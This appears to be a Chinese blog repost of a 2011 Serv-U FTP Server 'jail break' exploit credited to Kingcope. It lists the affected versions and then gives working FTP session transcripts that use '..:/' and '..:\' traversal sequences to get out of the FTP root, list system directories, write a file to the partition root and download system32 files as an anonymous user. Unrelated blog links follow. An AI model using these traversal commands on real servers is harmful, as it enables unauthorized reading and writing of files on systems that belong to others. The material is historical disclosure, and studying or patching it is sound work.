Serv-U FTP Jail Break（越权遍历目录、下载任意文件）

[*]----------------------------------------------------[*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*]----------------------------------------------------[*]

/*
通过构造..:/来遍历服务器目录，下载任意文件
影响版本：6.4，7.1，7.3，8.2，10.5
*/

Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...
[*]----------------------------------------------------[*]
C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp (anonymous user :>)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/program files"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r-- 1 user group 0 Nov 12 21:48 .
dr--r--r-- 1 user group 0 Nov 12 21:48 ..
drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundatio
n
drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications
drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files
drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer
drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources
d--------- 1 user group 0 Jul 8 16:12 InstallShield
Installation Information
drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer
drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch
drw-rw-rw- 1 user group 0 Feb 12 2011 Java
drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting
drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express
drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL
drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw- 1 user group 0 Feb 12 2011 Sun
d--------- 1 user group 0 Jul 29 15:13 Uninstall Information
drw-rw-rw- 1 user group 0 Feb 5 2011 VMware
drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR
drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player
drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT
d--------- 1 user group 0 Feb 5 2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>
[*]----------------------------------------------------[*]
with write perms:
ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition
[*]----------------------------------------------------[*]
and as anonymous ftp:
ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
[*]----------------------------------------------------[*]
This works to!!! :
220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
AUTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
Inetpub
IO.SYS
log
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s
[*]----------------------------------------------------[*]
Sometimes you need to give it the path:
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE Remote Tools
cmak
Common Files
ComPlus Applications
D-Tools
FFTPServer
HTML Help Workshop
IISServer
InstallShield Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Microsoft Device Emulator
Microsoft MapPoint Web Service Samples
Microsoft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafe
Microsoft Visual Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
Symantec
Thunder Network
TSingVision
Uninstall Information
Windows Media Player
Windows NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>

转载于:https://www.cnblogs.com/mujj/articles/2285875.html

Serv-U FTP Jail Break（越权遍历目录、下载任意文件）相关推荐

ubuntu下linux:curl使用ftp获取服务器上指定目录的所有文件集合以及下载
curl使用ftp获取服务器上指定目录的所有文件集合以及下载直接编译可用,注意修改测试main函数内的字符串,注释我觉得写的挺详细了,跑不起来的评论区可问头文件 #ifndef FTP_DOWNL ...
Linux和Windows的遍历目录下所有文件的方法对比
首先两者读取所有文件的方法都是采用迭代的方式,首先用函数A的返回值判断目录下是否有文件,然后返回值合法则在循环中用函数B直到函数B的返回值不合法为止.最后用函数C释放资源. 1.打开目录 #inclu ...
php 遍历目录,PHP采用自定义函数实现遍历目录下所有文件的方法
目录的遍历是PHP程序设计中经常会用到的一个功能,很多PHP项目都有这一功能模块.今天本文就来实例解析一下PHP采用自定义函数实现遍历目录下所有文件的方法.具体方法如下: 方法一:使用readir() ...
python如何搜索关键字_Python遍历目录和搜索文件中的关键字
2012-11-03 wcdj 遗留问题:如何处理中文 #-*- coding: gbk -*- ############ # 20121003 wcdj # FindFilev0.1 # 遍历目录和 ...
Python遍历目录下的文件（os.walk 、os.listdir的用法）
Python遍历目录下的文件(os.walk .os.listdir的用法) 最近想从一个目录转移一些文件到另外一个目录,因为文件有指定的后缀,所以想着用python来转移,不做cv工程师,那就涉及到 ...
java文件tree目录_java 遍历目录，操作文件 tree命令
用tree命令显示目录.文件结构有时候我们想了解一个文件夹或者驱动器根目录下的所有文件,并希望它以资源管理器的树形视图方式显示文件结构.可以在"命令提示符"窗口中输入" ...
File类（常用方法、遍历目录下的文件、listFiles()方法和删除文件及目录）
File类 File类的常用方法 Filie类常用的构造方法 File(String pathname) //通过指定的一个字符串类型的文件路径来创建一个新的File对象 File(String pa ...
Unity 遍历目录内所有文件并拷贝到指定目录
遍历目录内所有文件并拷贝到指定目录
JAVA:遍历目录下的文件
在实际应用中如何查看指定路径下的文件数目,java提供了一种list()函数用于遍历此路径下的所有文件.注意,在遍历的过程中需要指定文件的类型! import java.io.*; import ja ...

Serv-U FTP Jail Break（越权遍历目录、下载任意文件）

Serv-U FTP Jail Break（越权遍历目录、下载任意文件）相关推荐

最新文章

热门文章